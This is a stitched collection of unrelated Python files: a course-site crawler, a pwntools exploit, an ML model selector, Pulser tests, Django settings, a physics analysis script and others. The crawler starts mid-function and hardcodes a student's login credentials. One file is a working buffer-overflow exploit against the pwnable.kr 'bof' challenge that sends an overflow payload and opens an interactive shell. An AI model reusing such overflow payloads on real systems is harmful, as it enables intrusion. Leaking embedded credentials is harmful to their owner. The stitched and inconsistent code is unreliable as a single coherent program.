    Get_request = "GET http://cs5700sp17.ccs.neu.edu/accounts/login/ HTTP/1.1\n"
    Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
    Get_request += "Connection: keep-alive\n\n"
    #print(Get_request)
    sock.send(Get_request)
    data = sock.recv(12362)
    #print(data)
    parser.feed(data)
    #print(urlText)
    headers = []
    headers = urlText[0].split('\n')
    parser.close()
    # NOTE(review): cookie extraction relies on the csrf token and session id
    # sitting at fixed header lines 7 and 8 — brittle against server changes.
    csrf_token = headers[7].split(' ')[1]
    session_id = headers[8].split(' ')[1][:-1]
    #print(csrf_token)
    #print(session_id)
    Cookie = "Cookie: " + csrf_token + " " + session_id + "\r\n"
    csrfmiddlewaretoken = "csrfmiddlewaretoken=" + csrf_token[10:]
    #print(Cookie)
    #content_length = len(csrfmiddlewaretoken[:-1] + "&username=001218078&password=A52VUCSQ&next=%2Ffakebook%2f")
    # Form-encoded login body; Content-Length must match it exactly.
    body = 'csrfmiddlewaretoken={0}&username=001218078&password=A52VUCSQ&next=%2fFacebook%2f'.format(csrf_token[10:-1])
    content_length = len(body)
    login = ["POST " + "/accounts/login/" + " HTTP/1.1",
             "Host: cs5700sp17.ccs.neu.edu",
             "Cookie: {0} {1}".format(csrf_token, session_id),
             "Connection: keep-alive",
             "Content-Type: application/x-www-form-urlencoded",
             "Content-Length: {0}".format(content_length)]
    space = "\r\n"
    newlogin = space.join(login)
    Post_message = newlogin + "\r\n\r\n" + body
    #print(Post_message)
    sock.send(Post_message)
    data1 = sock.recv(12345)
    #print(data1)
    # Parse the POST response to pick up the authenticated session cookie.
    urlText = []
    parser.feed(data1)
    #print(urlText)
    headers = urlText[0].split('\n')
    session_id_POST = headers[7].split(' ')[1]
    parser.close()
    #print(session_id_POST)
    Get_request = "GET http://cs5700sp17.ccs.neu.edu/fakebook/ HTTP/1.1\n"
    Get_request += "Host: cs5700sp17.ccs.neu.edu\n"
    Get_request += "Cookie: {0} {1}\n\n".format(csrf_token,session_id_POST[:-1])
    #print(Get_request)
    sock.send(Get_request)
    data = sock.recv(12362)
    #print(data)
    #parser.feed(data)
    #print(attributes_url)
    #parser.close()
    #get_friends = ["GET {0} HTTP/1.1".format(attributes_url[1]),
    #               "Host: cs5700sp17.ccs.neu.edu",
    #               "Cookie: {0} {1}\n".format(csrf_token,session_id_POST[:-1])]
    #space1 = "\n"
    #Get_request = space1.join(login)
    #Post_message = newget_freiend + "\r\n\r\n" + body
    print(data)
    Crawl(sock,parser,data,csrf_token,session_id_POST)
    sock.close()
def Main():
    """Create a TCP/IP socket and kick off the crawl against the course server."""
    hostname = "cs5700f16.ccs.neu.edu"
    port = 80
    endpoint = (hostname, int(port))
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    StartCrawling(tcp_sock, endpoint)
#Trigger Main()
if __name__ == "__main__":
    # Entry point: only run the crawler when executed as a script.
    Main()
|
#!/usr/bin/env python3
import pwn
pwn.context(arch = "i386", os = "linux")
# Payload layout: 44+4+4 filler bytes, then 0xcafebabe, then a newline.
# NOTE(review): offsets presumably match the pwnable.kr 'bof' binary's stack
# layout (buffer + saved registers up to the checked variable) — confirm
# against the target binary before reuse.
PAYLOAD = pwn.flat('A' * (44+4+4), 0xcafebabe, '\n')
r = pwn.remote("pwnable.kr", 9000)
r.send(PAYLOAD)
# Hand the shell (if spawned) over to the user.
r.interactive()
|
#!/usr/bin/python3
""" saves all hot posts """
import requests
def recurse(subreddit, hot_list=None):
    """Fetch the current hot posts of *subreddit* from the Reddit API.

    :param subreddit: subreddit name
    :param hot_list: optional accumulator list, kept for signature
        compatibility. BUG FIX: this was previously a mutable default
        argument (``hot_list=[]``), which Python shares across calls.
    :return: list of post dicts, or None if the response has no usable data
        (e.g. an invalid subreddit that redirects)
    """
    if hot_list is None:
        hot_list = []
    rURL = "https://www.reddit.com/r/{}/hot.json".format(subreddit)
    # Custom User-Agent avoids Reddit's throttling of default agents;
    # allow_redirects=False makes invalid subreddits return no JSON data.
    h = {"User-Agent": 'any agent'}
    derulo = requests.get(rURL, headers=h, allow_redirects=False).json()
    if derulo is None:
        return None
    data = derulo.get('data')
    if data is None:
        return None
    return data.get('children')
|
def is_palindrome(s):
    """Return True if *s* reads the same forwards and backwards,
    ignoring case and every non-letter character."""
    letters = [ch for ch in s.lower() if ch.isalpha()]
    return letters == letters[::-1]
|
import argparse
import json
from os.path import join
from typing import List
import numpy as np
import pandas as pd
from tqdm import tqdm
from docqa import trainer
from docqa.data_processing.document_splitter import MergeParagraphs, TopTfIdf, ShallowOpenWebRanker, FirstN
from docqa.data_processing.preprocessed_corpus import preprocess_par
from docqa.data_processing.qa_training_data import ParagraphAndQuestionDataset
from docqa.data_processing.span_data import TokenSpans
from docqa.data_processing.text_utils import NltkPlusStopWords
from docqa.dataset import FixedOrderBatcher
from docqa.eval.ranked_scores import compute_ranked_scores
from docqa.evaluator import Evaluator, Evaluation
from docqa.model_dir import ModelDir
from build_span_corpus import XQADataset
from docqa.triviaqa.read_data import normalize_wiki_filename
from docqa.triviaqa.training_data import DocumentParagraphQuestion, ExtractMultiParagraphs, \
ExtractMultiParagraphsPerQuestion
from docqa.triviaqa.trivia_qa_eval import exact_match_score as trivia_em_score
from docqa.triviaqa.trivia_qa_eval import f1_score as trivia_f1_score
from docqa.utils import ResourceLoader, print_table
from docqa.text_preprocessor import WithIndicators
def main():
    """Select paragraphs for an XQA corpus and pickle (question, paragraph) pairs for BERT evaluation."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--n_processes', type=int, default=1,
                        help="Number of processes to do the preprocessing (selecting paragraphs+loading context) with")
    # NOTE(review): '--async' is parsed but never read below; 'async' is a
    # reserved word in Python 3.7+, so args.async cannot even be written.
    parser.add_argument('-a', '--async', type=int, default=10)
    parser.add_argument('-t', '--tokens', type=int, default=400,
                        help="Max tokens per a paragraph")
    parser.add_argument('-n', '--n_sample', type=int, default=None, help="Number of questions to evaluate on")
    parser.add_argument('-g', '--n_paragraphs', type=int, default=15,
                        help="Number of paragraphs to run the model on")
    parser.add_argument('-f', '--filter', type=str, default=None, choices=["tfidf", "truncate", "linear"],
                        help="How to select paragraphs")
    parser.add_argument('-c', '--corpus',
                        choices=["en_dev",
                                 "en_test",
                                 "fr_dev",
                                 "fr_test",
                                 "de_dev",
                                 "de_test",
                                 "ru_dev",
                                 "ru_test",
                                 "pt_dev",
                                 "pt_test",
                                 "zh_dev",
                                 "zh_test",
                                 "pl_dev",
                                 "pl_test",
                                 "uk_dev",
                                 "uk_test",
                                 "ta_dev",
                                 "ta_test",
                                 "fr_trans_en_dev",
                                 "fr_trans_en_test",
                                 "de_trans_en_dev",
                                 "de_trans_en_test",
                                 "ru_trans_en_dev",
                                 "ru_trans_en_test",
                                 "pt_trans_en_dev",
                                 "pt_trans_en_test",
                                 "zh_trans_en_dev",
                                 "zh_trans_en_test",
                                 "pl_trans_en_dev",
                                 "pl_trans_en_test",
                                 "uk_trans_en_dev",
                                 "uk_trans_en_test",
                                 "ta_trans_en_dev",
                                 "ta_trans_en_test"],
                        required=True)
    args = parser.parse_args()
    # Corpus id is "<lang[_trans_en]>_<dev|test>"; split on the last underscore.
    corpus_name = args.corpus[:args.corpus.rfind("_")]
    eval_set = args.corpus[args.corpus.rfind("_")+1:]
    dataset = XQADataset(corpus_name)
    if eval_set == "dev":
        test_questions = dataset.get_dev()
    elif eval_set == "test":
        test_questions = dataset.get_test()
    else:
        raise AssertionError()
    corpus = dataset.evidence
    splitter = MergeParagraphs(args.tokens)
    # NOTE(review): no corpus choice above starts with "web", so per_document
    # is always False here — confirm whether that is intentional.
    per_document = args.corpus.startswith("web")  # wiki and web are both multi-document
    filter_name = args.filter
    if filter_name is None:
        # Pick default depending on the kind of data we are using
        if per_document:
            filter_name = "tfidf"
        else:
            filter_name = "linear"
    print("Selecting %d paragraphs using method \"%s\" per %s" % (
        args.n_paragraphs, filter_name, ("question-document pair" if per_document else "question")))
    if filter_name == "tfidf":
        para_filter = TopTfIdf(NltkPlusStopWords(punctuation=True), args.n_paragraphs)
    elif filter_name == "truncate":
        para_filter = FirstN(args.n_paragraphs)
    elif filter_name == "linear":
        para_filter = ShallowOpenWebRanker(args.n_paragraphs)
    else:
        raise ValueError()
    n_questions = args.n_sample
    if n_questions is not None:
        # Sort then shuffle with a fixed seed so the sampled subset is reproducible.
        test_questions.sort(key=lambda x:x.question_id)
        np.random.RandomState(0).shuffle(test_questions)
        test_questions = test_questions[:n_questions]
    preprocessor = WithIndicators()
    print("Building question/paragraph pairs...")
    # Loads the relevant questions/documents, selects the right paragraphs, and runs the model's preprocessor
    if per_document:
        prep = ExtractMultiParagraphs(splitter, para_filter, preprocessor, require_an_answer=False)
    else:
        prep = ExtractMultiParagraphsPerQuestion(splitter, para_filter, preprocessor, require_an_answer=False)
    prepped_data = preprocess_par(test_questions, corpus, prep, args.n_processes, 1000)
    data = []
    for q in prepped_data.data:
        for i, p in enumerate(q.paragraphs):
            if q.answer_text is None:
                ans = None
            else:
                ans = TokenSpans(q.answer_text, p.answer_spans)
            data.append(DocumentParagraphQuestion(q.question_id, p.doc_id,
                                                  (p.start, p.end), q.question, p.text,
                                                  ans, i))
    # Reverse so our first batch will be the largest (so OOMs happen early)
    questions = sorted(data, key=lambda x: (x.n_context_words, len(x.question)), reverse=True)
    # dump eval data for bert
    import pickle
    pickle.dump(questions, open("%s_%d.pkl" % (args.corpus, args.n_paragraphs), "wb"))
# Script entry point.
if __name__ == "__main__":
    main()
|
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from sklearn.metrics import roc_auc_score,accuracy_score
class ModelFinder:
    """
    This class shall be used to find the model with best accuracy and AUC score.
    Written By: Durgesh Kumar
    Version: 1.0
    Revisions: None
    """

    def __init__(self, file, logger):
        # file/logger are used for all progress and error logging.
        self.file = file
        self.logger = logger
        # Base estimators; both are replaced by tuned models once the
        # GetBestParamsFor* methods have run.
        self.rfc = RandomForestClassifier()
        self.xgb = XGBClassifier(objective='binary:logistic')

    def GetBestParamsForRandomForest(self, train_x, train_y):
        """
        Method Name: GetBestParamsForRandomForest
        Description: get the parameters for Random Forest Algorithm which give the best accuracy.
                     Use Hyper Parameter Tuning.
        Output: The model with the best parameters
        On Failure: Raise Exception
        Written By: Durgesh Kumar
        Version: 1.0
        Revisions: None
        """
        self.logger.log(self.file, 'Entered the GetBestParamsForRandomForest method of the ModelFinder class')
        try:
            # initializing with different combination of parameters
            self.param_grid = {"n_estimators": [10, 50, 100, 130], "criterion": ['gini', 'entropy'],
                               "max_depth": range(2, 4, 1), "max_features": ['auto', 'log2']}
            # Creating an object of the Grid Search class
            self.grid = GridSearchCV(estimator=self.rfc, param_grid=self.param_grid, cv=5, verbose=3)
            # finding the best parameters
            self.grid.fit(train_x, train_y)
            # extracting the best parameters
            self.criterion = self.grid.best_params_['criterion']
            self.max_depth = self.grid.best_params_['max_depth']
            self.max_features = self.grid.best_params_['max_features']
            self.n_estimators = self.grid.best_params_['n_estimators']
            # creating a new model with the best parameters
            self.rfc = RandomForestClassifier(n_estimators=self.n_estimators, criterion=self.criterion,
                                              max_depth=self.max_depth, max_features=self.max_features)
            # training the new model
            self.rfc.fit(train_x, train_y)
            self.logger.log(self.file, 'Random Forest best params: '+str(self.grid.best_params_)+'. Exited the GetBestParamsForRandomForest method of the ModelFinder class')
            return self.rfc
        except Exception as e:
            self.logger.log(self.file, 'Exception occured in GetBestParamsForRandomForest method of the ModelFinder class. Exception message: ' + str(e))
            self.logger.log(self.file, 'Random Forest Parameter tuning failed. Exited the GetBestParamsForRandomForest method of the ModelFinder class')
            raise Exception()

    def GetBestParamsForXgboost(self, train_x, train_y):
        """
        Method Name: GetBestParamsForXgboost
        Description: get the parameters for XGBoost Algorithm which give the best accuracy.
                     Use Hyper Parameter Tuning.
        Output: The model with the best parameters
        On Failure: Raise Exception
        Written By: Durgesh Kumar
        Version: 1.0
        Revisions: None
        """
        self.logger.log(self.file, 'Entered the GetBestParamsForXgboost method of the ModelFinder class')
        try:
            # initializing with different combination of parameters
            self.param_grid_xgboost = {
                'learning_rate': [0.5, 0.1, 0.01, 0.001],
                'max_depth': [3, 5, 10, 20],
                'n_estimators': [10, 50, 100, 200]
            }
            # Creating an object of the Grid Search class
            self.grid = GridSearchCV(XGBClassifier(objective='binary:logistic'), self.param_grid_xgboost, verbose=3, cv=5)
            # finding the best parameters
            self.grid.fit(train_x, train_y)
            # extracting the best parameters
            self.learning_rate = self.grid.best_params_['learning_rate']
            self.max_depth = self.grid.best_params_['max_depth']
            self.n_estimators = self.grid.best_params_['n_estimators']
            # creating a new model with the best parameters
            # BUG FIX: the refit model previously used hard-coded values
            # (learning_rate=1, max_depth=5, n_estimators=50) instead of the
            # parameters found by the grid search above, and dropped the
            # binary:logistic objective.
            self.xgb = XGBClassifier(objective='binary:logistic', learning_rate=self.learning_rate,
                                     max_depth=self.max_depth, n_estimators=self.n_estimators)
            # training the new model
            self.xgb.fit(train_x, train_y)
            self.logger.log(self.file, 'XGBoost best params: ' + str(self.grid.best_params_) + '. Exited the GetBestParamsForXgboost method of the ModelFinder class')
            return self.xgb
        except Exception as e:
            self.logger.log(self.file, 'Exception occured in GetBestParamsForXgboost method of the ModelFinder class. Exception message: ' + str(e))
            self.logger.log(self.file, 'XGBoost Parameter tuning failed. Exited the GetBestParamsForXgboost method of the ModelFinder class')
            raise Exception()

    def GetBestModel(self, train_x, train_y, test_x, test_y):
        """
        Method Name: GetBestModel
        Description: Find out the Model which has the best AUC score.
        Output: The best model name and the model object
        On Failure: Raise Exception
        Written By: Durgesh Kumar
        Version: 1.0
        Revisions: None
        """
        self.logger.log(self.file, 'Entered the GetBestModel method of the ModelFinder class')
        # create best model for XGBoost
        try:
            self.xgboost = self.GetBestParamsForXgboost(train_x, train_y)
            # NOTE(review): AUC from hard class predictions is coarse;
            # predict_proba scores would be more informative -- confirm intent.
            self.PredictionXgboost = self.xgboost.predict(test_x)  # Predictions using the XGBoost Model
            if len(test_y.unique()) == 1:  # if there is only one label in y, then roc_auc_score returns error. We will use accuracy in that case
                self.XgboostScore = accuracy_score(test_y, self.PredictionXgboost)
                self.logger.log(self.file, 'Accuracy for XGBoost:' + str(self.XgboostScore))
            else:
                self.XgboostScore = roc_auc_score(test_y, self.PredictionXgboost)  # AUC for XGBoost
                self.logger.log(self.file, 'AUC for XGBoost:' + str(self.XgboostScore))  # Log AUC
            # create best model for Random Forest
            self.random_forest = self.GetBestParamsForRandomForest(train_x, train_y)
            self.PredictionRandomForest = self.random_forest.predict(test_x)  # prediction using the Random Forest Algorithm
            if len(test_y.unique()) == 1:  # if there is only one label in y, then roc_auc_score returns error. We will use accuracy in that case
                self.random_forest_score = accuracy_score(test_y, self.PredictionRandomForest)
                self.logger.log(self.file, 'Accuracy for RF:' + str(self.random_forest_score))
            else:
                self.random_forest_score = roc_auc_score(test_y, self.PredictionRandomForest)  # AUC for Random Forest
                self.logger.log(self.file, 'AUC for RF:' + str(self.random_forest_score))
            # comparing the two models; ties go to Random Forest
            if (self.random_forest_score < self.XgboostScore):
                return 'XGBoost', self.xgboost
            else:
                return 'RandomForest', self.random_forest
        except Exception as e:
            self.logger.log(self.file, 'Exception occured in GetBestModel method of the ModelFinder class. Exception message: ' + str(e))
            self.logger.log(self.file, 'Model Selection Failed. Exited the GetBestModel method of the ModelFinder class')
            raise Exception()
|
# Copyright 2020 Pulser Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from hashlib import sha256
from unittest.mock import patch
import numpy as np
import pytest
from pulser.register import Register, Register3D
from pulser.register.register_layout import RegisterLayout
from pulser.register.special_layouts import (
SquareLatticeLayout,
TriangularLatticeLayout,
)
@pytest.fixture
def layout():
    """A four-trap 2D layout on the unit square, slugged "2DLayout"."""
    trap_coords = [[0, 0], [1, 1], [1, 0], [0, 1]]
    return RegisterLayout(trap_coords, slug="2DLayout")
@pytest.fixture
def layout3d():
    """A four-trap 3D layout with no slug."""
    trap_coords = [[0, 0, 0], [1, 1, 1], [0, 1, 0], [1, 0, 1]]
    return RegisterLayout(trap_coords)
def test_creation(layout, layout3d):
    """RegisterLayout construction: input validation, coordinate sorting
    and trap bookkeeping."""
    # Mixed 2D/3D coordinates are rejected.
    with pytest.raises(
        ValueError, match="must be an array or list of coordinates"
    ):
        RegisterLayout([[0, 0, 0], [1, 1], [1, 0], [0, 1]])
    # A flat list of numbers is not a list of coordinates.
    with pytest.raises(
        ValueError, match="must be an array or list of coordinates"
    ):
        RegisterLayout([0, 1, 2])
    with pytest.raises(ValueError, match="size 2 or 3"):
        RegisterLayout([[0], [1], [2]])
    with pytest.raises(
        ValueError,
        match="All trap coordinates of a register layout must be unique.",
    ):
        RegisterLayout([[0, 1], [0.0, 1.0]])
    # Coordinates come back sorted, regardless of input order.
    assert np.all(layout.coords == [[0, 0], [0, 1], [1, 0], [1, 1]])
    assert np.all(
        layout3d.coords == [[0, 0, 0], [0, 1, 0], [1, 0, 1], [1, 1, 1]]
    )
    assert layout.number_of_traps == 4
    assert layout.dimensionality == 2
    # traps_dict maps trap IDs to their (sorted) coordinates.
    for i, coord in enumerate(layout.coords):
        assert np.all(layout.traps_dict[i] == coord)
def test_slug(layout, layout3d):
    """str() uses the slug when present, otherwise falls back to repr()."""
    assert layout.slug == "2DLayout"
    assert layout3d.slug is None
    assert str(layout) == "2DLayout"
    assert str(layout3d) == repr(layout3d)
def test_register_definition(layout, layout3d):
    """define_register(): trap-ID and qubit-ID validation, plus the
    layout back-reference checks on the resulting register."""
    # Trap IDs must be unique integers...
    with pytest.raises(ValueError, match="must be a unique integer"):
        layout.define_register(0, 1, 1)
    # ...and refer to existing traps.
    with pytest.raises(ValueError, match="correspond to the ID of a trap"):
        layout.define_register(0, 4, 3)
    with pytest.raises(ValueError, match="must be a sequence of unique IDs"):
        layout.define_register(0, 1, qubit_ids=["a", "b", "b"])
    with pytest.raises(ValueError, match="must have the same size"):
        layout.define_register(0, 1, qubit_ids=["a", "b", "c"])
    # Successful definitions compare equal to equivalent hand-built registers.
    assert layout.define_register(0, 1) == Register.from_coordinates(
        [[0, 0], [0, 1]], prefix="q", center=False
    )
    assert layout3d.define_register(0, 1) == Register3D(
        {"q0": [0, 0, 0], "q1": [0, 1, 0]}
    )
    # The register remembers which layout and trap IDs it came from.
    reg2d = layout.define_register(0, 2)
    assert reg2d._layout_info == (layout, (0, 2))
    with pytest.raises(ValueError, match="dimensionality is not the same"):
        reg2d._validate_layout(layout3d, (0, 2))
    with pytest.raises(
        ValueError, match="Every 'trap_id' must be a unique integer"
    ):
        reg2d._validate_layout(layout, (0, 2, 2))
    with pytest.raises(
        ValueError, match="must be equal to the number of atoms"
    ):
        reg2d._validate_layout(layout, (0,))
    with pytest.raises(
        ValueError, match="don't match this register's coordinates"
    ):
        reg2d._validate_layout(layout, (0, 1))
    # A layout-backed register cannot be transformed.
    with pytest.raises(TypeError, match="cannot be rotated"):
        reg2d.rotate(30)
def test_draw(layout, layout3d, patch_plt_show):
    """Smoke-test drawing in 2D and 3D, with and without saving to file."""
    layout.draw()
    # savefig is mocked so no file is actually written.
    with patch("matplotlib.pyplot.savefig"):
        layout.draw(fig_name="my_registerlayout.pdf")
    layout3d.draw()
    layout3d.draw(projection=False)
    with patch("matplotlib.pyplot.savefig"):
        layout3d.draw(fig_name="my_registerlayout.pdf")
def test_repr(layout):
    """repr() embeds a SHA-256 digest of the layout contents."""
    # bytes(2) is b"\x00\x00"; presumably mirrors how RegisterLayout seeds
    # its own hash for a 2D layout -- TODO confirm against the implementation.
    hash_ = sha256(bytes(2))
    hash_.update(layout.coords.tobytes())
    assert repr(layout) == f"RegisterLayout_{hash_.hexdigest()}"
def test_static_hash(layout):
    """static_hash() is the hex form of _safe_hash(), and repr() reuses it."""
    int_hash = int.from_bytes(layout._safe_hash(), byteorder="big")
    assert layout.static_hash() == f"{int_hash:x}"
    assert repr(layout) == f"RegisterLayout_{layout.static_hash()}"
def test_eq(layout, layout3d):
    """Equality ignores coordinate order but distinguishes type and
    dimensionality; equal layouts hash alike."""
    # A layout is never equal to a plain Register with the same coordinates.
    assert RegisterLayout([[0, 0], [1, 0]]) != Register.from_coordinates(
        [[0, 0], [1, 0]]
    )
    assert layout != layout3d
    layout1 = RegisterLayout([[0, 0], [1, 0]])
    layout2 = RegisterLayout([[1, 0], [0, 0]])
    assert layout1 == layout2
    assert hash(layout1) == hash(layout2)
def test_traps_from_coordinates(layout):
    """Coordinate -> trap-ID lookup, including rounding of near-miss values."""
    assert layout._coords_to_traps == {
        (0, 0): 0,
        (0, 1): 1,
        (1, 0): 2,
        (1, 1): 3,
    }
    # Coordinates within the rounding tolerance still resolve to a trap
    # (tolerance appears to be 6 decimal places -- TODO confirm).
    assert layout.get_traps_from_coordinates(
        (0.9999995, 0.0000004), (0, 1), (1, 1)
    ) == [2, 1, 3]
    # ...but beyond the tolerance the lookup fails.
    with pytest.raises(ValueError, match="not a part of the RegisterLayout"):
        layout.get_traps_from_coordinates((0.9999994, 1))
def test_square_lattice_layout():
    """SquareLatticeLayout: string form, and carving square/rectangular
    registers out of the lattice."""
    square = SquareLatticeLayout(9, 7, 5)
    assert str(square) == "SquareLatticeLayout(9x7, 5.0µm)"
    assert square.square_register(3) == Register.square(
        3, spacing=5, prefix="q"
    )
    # An even number of atoms on the side won't align the center with an atom
    assert square.square_register(4) != Register.square(
        4, spacing=5, prefix="q"
    )
    # Requested registers must fit inside the 9x7 lattice.
    with pytest.raises(ValueError, match="'8x8' array doesn't fit"):
        square.square_register(8)
    assert square.rectangular_register(3, 7, prefix="r") == Register.rectangle(
        3, 7, spacing=5, prefix="r"
    )
    with pytest.raises(ValueError, match="'10x3' array doesn't fit"):
        square.rectangular_register(10, 3)
def test_triangular_lattice_layout():
    """TriangularLatticeLayout: string form, hexagonal and rectangular
    register carving, and capacity limits."""
    tri = TriangularLatticeLayout(50, 5)
    assert str(tri) == "TriangularLatticeLayout(50, 5.0µm)"
    # 19 atoms fill a 2-layer hexagon.
    assert tri.hexagonal_register(19) == Register.hexagon(
        2, spacing=5, prefix="q"
    )
    # More atoms than traps is rejected with a fully spelled-out message.
    with pytest.raises(
        ValueError,
        match=re.escape(
            "The desired register has more atoms (51) than there"
            " are traps in this TriangularLatticeLayout (50)"
        ),
    ):
        tri.hexagonal_register(51)
    with pytest.raises(
        ValueError, match="has more atoms than there are traps"
    ):
        tri.rectangular_register(7, 8)
    # Case where the register doesn't fit
    with pytest.raises(ValueError, match="not a part of the RegisterLayout"):
        tri.rectangular_register(8, 3)
    # But this fits fine, though off-centered with the Register default
    assert tri.rectangular_register(5, 5) != Register.triangular_lattice(
        5, 5, spacing=5, prefix="q"
    )
def test_mappable_register_creation():
    """MappableRegister: qubit-ID declaration, index lookup and build."""
    tri = TriangularLatticeLayout(50, 5)
    with pytest.raises(ValueError, match="greater than the number of traps"):
        tri.make_mappable_register(51)
    mapp_reg = tri.make_mappable_register(5)
    assert mapp_reg.qubit_ids == ("q0", "q1", "q2", "q3", "q4")
    # Lookup accepts duplicates and preserves request order.
    assert mapp_reg.find_indices(["q4", "q2", "q1", "q2"]) == [4, 2, 1, 2]
    with pytest.raises(
        ValueError, match="must be selected among pre-declared qubit IDs"
    ):
        mapp_reg.find_indices(["q4", "q2", "q1", "q5"])
    with pytest.raises(
        ValueError, match="labeled with pre-declared qubit IDs"
    ):
        mapp_reg.build_register({"q0": 0, "q5": 2})
    # Apparently the first n declared IDs must be used when building an
    # n-qubit register -- the error text suggests so; TODO confirm.
    with pytest.raises(ValueError, match="To declare 2 qubits"):
        mapp_reg.build_register({"q0": 0, "q2": 2})
    qubit_map = {"q0": 10, "q1": 49}
    reg = mapp_reg.build_register(qubit_map)
    assert reg == Register(
        {"q0": tri.traps_dict[10], "q1": tri.traps_dict[49]}
    )
    # Index lookup agrees between the mappable and the built register.
    names = ["q1", "q0", "q0"]
    assert mapp_reg.find_indices(names) == reg.find_indices(names)
|
#!/usr/bin/env python
# -*-encoding:UTF-8-*-
from myutils.shortcuts import get_env
#
# Database connection comes entirely from the environment so the same
# settings file works in any deployment.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'HOST': get_env("POSTGRES_HOST", "icqbpmssoj-postgres"),
        # BUG FIX: the port previously read the POSTGRES_HOST variable
        # (a hostname); it must read POSTGRES_PORT, defaulting to 5432.
        'PORT': get_env("POSTGRES_PORT", "5432"),
        'NAME': get_env("POSTGRES_DB"),
        'USER': get_env("POSTGRES_USER"),
        'PASSWORD': get_env("POSTGRES_PASSWORD")
    }
}
# Redis connection, also environment-driven.
REDIS_CONF = {
    "host": get_env("REDIS_HOST", "icqbpmssoj-redis"),
    "port": get_env("REDIS_PORT", "6379")
}
# if DEBUG is False, you also need to properly set the ALLOWED_HOSTS setting.
# Failing to do so will result in all requests being returned as “Bad Request (400)”.
DEBUG = False
#
ALLOWED_HOSTS = ['*']
DATA_DIR = "/data"
|
import postvdm
import pandas as pd
import pickle as pkl
import os
import re
import json
# automation = '/brildata/vdmoutput/Automation/'
# Root of the automated VdM analysis output tree.
automation = '/brildata/vdmoutput18/'
detectors = ['PLT','BCM1FPCVD','BCM1FSI','HFET','HFOC']
# Walk every analysed scan directory and (re)post its calibration results.
for scan in os.listdir(automation+'Analysed_Data/'):
    # Only scans whose leading 4-digit number (presumably the fill) is >= 6699.
    if int(scan[:4])<6699:continue
    try:
        # Scan metadata is stored either as a pickle or as JSON.
        # NOTE(review): text-mode open() for pickle implies Python 2 -- confirm.
        if os.path.exists(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.pkl'):
            with open(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.pkl') as pf:
                scanfile = pkl.load(pf)
        else:
            with open(automation+'Analysed_Data/' +scan+'/cond/Scan_' + scan[:4] + '.json') as jf:
                scanfile = json.load(jf)
        for detector in detectors:
            try:
                # PCVD results may be stored under the plain BCM1F name.
                if detector=='BCM1FPCVD' and not os.path.exists(automation+'Analysed_Data/'+scan+'/'+detector):
                    detector = 'BCM1F'
                files = os.listdir(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/')
                lumicals = [f for f in files if 'LumiCalibration' in f and 'pkl' in f]
                for lumical in lumicals:
                    # The fit name is encoded in the calibration file name.
                    fit = re.match('LumiCalibration_[A-Z1]*_([A-Za-z]*)_\d{4}\.pkl',lumical).groups()[0]
                    fitres = fit+'_FitResults.pkl'
                    # Both pickles hold a header row followed by data rows.
                    with open(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/'+fitres) as tempfile:
                        temp = pkl.load(tempfile)
                    fits = pd.DataFrame(temp[1:],columns=temp[0])
                    with open(automation+'Analysed_Data/'+scan+'/'+detector+'/results/BeamBeam/'+lumical) as tempfile:
                        temp = pkl.load(tempfile)
                    cals = pd.DataFrame(temp[1:],columns=temp[0])
                    postvdm.PostOutput(fits,cals,scanfile['ScanTimeWindows'],int(scanfile['Fill']),\
                        scanfile['Run'][0],False,scan,detector,fit,scanfile['Angle'],\
                        automation_folder=automation,post=True)
            except Exception as e:
                # Best-effort: report and continue with the next detector.
                print(e)
                # print fit, scan, detector
    except Exception as e:
        # Best-effort: report and continue with the next scan.
        print(e)
import os
import pathlib
import sys
import unittest
# Make the package root importable when running from the tests directory.
sys.path.append("..")
# Shared fixture locations for the test suite.
DATA_DIR = "%s/../../data/test" % pathlib.Path(__file__).parent.absolute()
WORK_DIR = "/tmp/squad-tests"
class TestAll(unittest.TestCase):
    """End-to-end smoke test for the SQuAD training entry point."""

    def test_train(self):
        """Run one tiny training step in a child process and verify the
        expected output directories exist afterwards."""
        from src.squad.train import train
        # All hyper-parameters are passed as strings; train() apparently
        # parses them itself -- TODO confirm against its signature.
        squad_path = WORK_DIR
        sent_size_th = "10"
        ques_size_th = "10"
        num_epochs = "1"
        num_steps = "1"
        eval_period = "1"
        save_period = "1"
        learning_rate = "0.5"
        batch_size = "60"
        hidden_size = "100"
        var_decay = "0.999"
        training_mode = "span"
        model_path = WORK_DIR
        device = "/cpu:0"
        device_type = "gpu"
        num_gpus = "1"
        try:
            from multiprocessing import Process
            # Run in a subprocess so the trainer cannot take down pytest.
            args = (
                squad_path,
                sent_size_th,
                ques_size_th,
                num_epochs,
                num_steps,
                eval_period,
                save_period,
                learning_rate,
                batch_size,
                hidden_size,
                var_decay,
                training_mode,
                device,
                device_type,
                num_gpus,
                model_path,
            )
            p = Process(target=train, args=args)
            p.start()
            p.join()
        except SystemExit:
            # NOTE(review): a SystemExit raised inside the child process does
            # not propagate to this parent, so this handler likely never fires.
            print("Finished successfully!")
        # Check model directory has all files
        self.assertIn("out", os.listdir(model_path))
        self.assertIn("squad", os.listdir(model_path + "/out"))
# Run the test suite when executed directly.
if __name__ == "__main__":
    unittest.main()
|
import logging
import os
import sys
import cv2
import imutils
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from matplotlib.path import Path
from shapely.affinity import translate, scale
from skimage import measure
import time
from configuration import Config as cfg
from dto import BoundingBox, Contour
logger = logging.getLogger(__name__)
def init_logger():
    """Configure root logging: the root logger accepts DEBUG records, but
    the stdout handler only emits ERROR; the noisy PIL PNG plugin logger
    is raised to INFO."""
    root = logging.getLogger()
